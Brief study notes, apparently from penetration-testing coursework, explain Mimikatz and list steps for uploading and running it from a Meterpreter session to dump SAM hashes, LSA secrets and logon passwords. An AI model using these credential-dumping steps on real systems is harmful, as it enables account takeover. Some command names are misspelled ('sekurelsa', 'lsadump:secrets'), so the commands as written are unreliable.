• MimiKatz is a Post-Exploitation tool that extracts clear text passwords, hashes and Kerberos tickets from memory.

• The SAM (Security Account Manager) database, is a database file on Windows systems that stores hashed user passwords.

• Mimikatz can be used to extract hashed from the lsass.exe process memory where hashes are cached.

What to do when we have initial access (E.g. meterpreter session):

1. Go to Temp directory.
2. upload MimiKatz there: upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
3. then run the shell command.
4. go the the location of the file we uploaded and execute Mimikatz.exe from there....
5. use: lsadump::sam this will provide more information than Kiwi would give.
6. use : lsadump:secrets same as the lsa_dump_secrets command from Kiwi.
7. use: sekurelsa::logonpasswords Might display Logon clear text passwords.